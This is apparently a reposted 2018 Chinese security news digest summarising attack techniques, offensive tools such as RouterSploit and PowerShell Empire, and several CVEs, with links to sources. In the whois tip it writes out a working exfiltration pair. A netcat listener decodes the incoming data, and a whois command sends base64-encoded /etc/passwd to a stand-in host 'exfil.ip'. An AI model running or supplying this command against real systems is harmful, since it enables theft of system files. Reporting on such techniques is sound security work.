BurpBounty:改进burp扫描器的扩展;Git RCE 漏洞分析与利用

姿势

1.通过BlueTooth的交互式Shell

通过蓝牙RFCOMM协议可以建立两个设备间的通信,通信过程相关编程与TCP/IP协议下的socket通信有相似之处。获取shell最常用的方法是分离进程,使用socket作为stdin / stdout / stderr进行子进程并运行命令解释器,再通过通过sudo缓存提高权限。

参考链接:

https://www.tarlogic.com/en/blog/interactive-shell-via-bluetooth/

2.使用 Whois 命令进行文件传输的技巧

可以使用Whois作为恶意文件传输工具,从目标中删除文件。

On Exfil Server: nc -l -v -p 43 | sed "s/ //g" | base64 -d

On Target Server: whois -h exfil.ip -p 43 `cat /etc/passwd | base64`

参考链接:

https://twitter.com/i/web/status/1001985728342102017

3.Git RCE 漏洞分析与利用(CVE-2018-11235)

近期git出现严重漏洞CVE-2018-11235,该漏洞允许在运行'git clone --recurse-submodules'(或已弃用的'git clone --recursive')时可实现任意代码的执行。恶意仓库包含指向仓库外部的.git modules子模块配置文件。 当git clone这样的仓库时,它可以被诱骗到clone子模块内(非.git目录)的hook,从而实现任意代码执行。

参考链接:

https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/

4.将SSRF转换为jira中的XSS

jira低版本中存在ssrf漏洞,作者使用svg文件来触发xss漏洞,将jira的ssrf漏洞利用为xss漏洞。

参考链接:

https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158

姿势

1.RouterSploit v3.0 - 嵌入式设备渗透测试框架

RouterSploit框架是一个开源专用于嵌入式设备的渗透测试框架。包含的模块如下:

漏洞利用 - 利用已发现漏洞的模块

creds - 用于测试网络服务凭证的模块

扫描仪 - 检查目标是否容易受到漏洞攻击的模块

有效载荷 - 负责为各种体系结构和注入点生成有效载荷的模块

通用 - 执行通用攻击的模块

参考链接:

https://www.kitploit.com/2018/06/routersploit-v30-exploitation-framework.html

2.PowerShell Empire Web v2.0

PowerShell Empire Web使用的 Empire REST API 服务,它是PowerShell Empire的Web界面。Empire是一个针对windows平台的使用PowerShell脚本作为攻击载荷的渗透攻击框架,包括了从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。

参考链接:

https://github.com/interference-security/empire-web

3.BurpBounty:改进burp扫描器的扩展

BurpBounty是改进主动和被动扫描器的Burp扩展,可以通过图形界面,快速制定自定义规则,改进burp的主动式和被动式扫描。通过对模式的高级搜索和对发送负载的改进,可以在主动扫描器和被动模式下创建自己的扫描配置文件。

参考链接:

https://www.kitploit.com/2018/06/burpbounty-extension-of-burp-suite-that.html

4.otseca:开源 Linux 安全审计工具

Otseca是一个开源的安全审计工具,用于搜索和导出系统配置,并生成html格式的报告。

参考链接:

https://github.com/trimstray/otseca

资讯

1.因配置不当,Google Groups 上泄露大量敏感数据

由于Google网络论坛的错误配置,大量敏感数据被泄漏。拥有公开Google Groups设置的9,600个组织(超过250万个受检域)中,Kenna团队发现其中31%(约3,000)正在公开数据,受错误配置影响的人数可能达到数万人。

参考链接:

https://threatpost.com/public-google-groups-leaking-sensitive-data-at-thousands-of-orgs/132455/

2.CVE-2018-11481:多款TP-LINK产品远程代码执行安全漏洞

TP-LINK IPCTL-IPC223(P)-6, TL-IPC323K-D, TL-IPC325(KP)-*, and TL-IPC40A-4设备允许通过精心设计的JSON数据执行远程代码,由于/usr/lib/lua/luci/torchlight/validator.lua不会阻止各种标点符号导致。

参考链接:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11481

3.CVE-2018-11625:ImageMagick 堆缓冲区溢出漏洞

在ImageMagick7.0.7-37Q16中,quantize.c文件中的SetGrayscaleImage允许攻击者通过制作的文件导致基于堆的缓冲区重读。

参考链接:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11625

4.Sonic&Ultra信号可以使Windows,Linux硬盘崩溃

一项新的研究表明,最新一代的硬盘更容易受到声波干扰。超声波如果在不可靠或便宜的扬声器上播放,可能会对计算机系统造成严重损害。这是因为超声波和声音有能力破坏磁性HDD的读写过程。在Linux或Windows操作系统上运行的笔记本电脑可能需要重新启动才能在声波声音攻击后正常运行。

参考链接:

https://www.hackread.com/sonic-ultra-signals-attack-crash-windows-linux-hard-drives/

欢迎酷爱技术的你来破壳交流。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180605G07MZQ00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券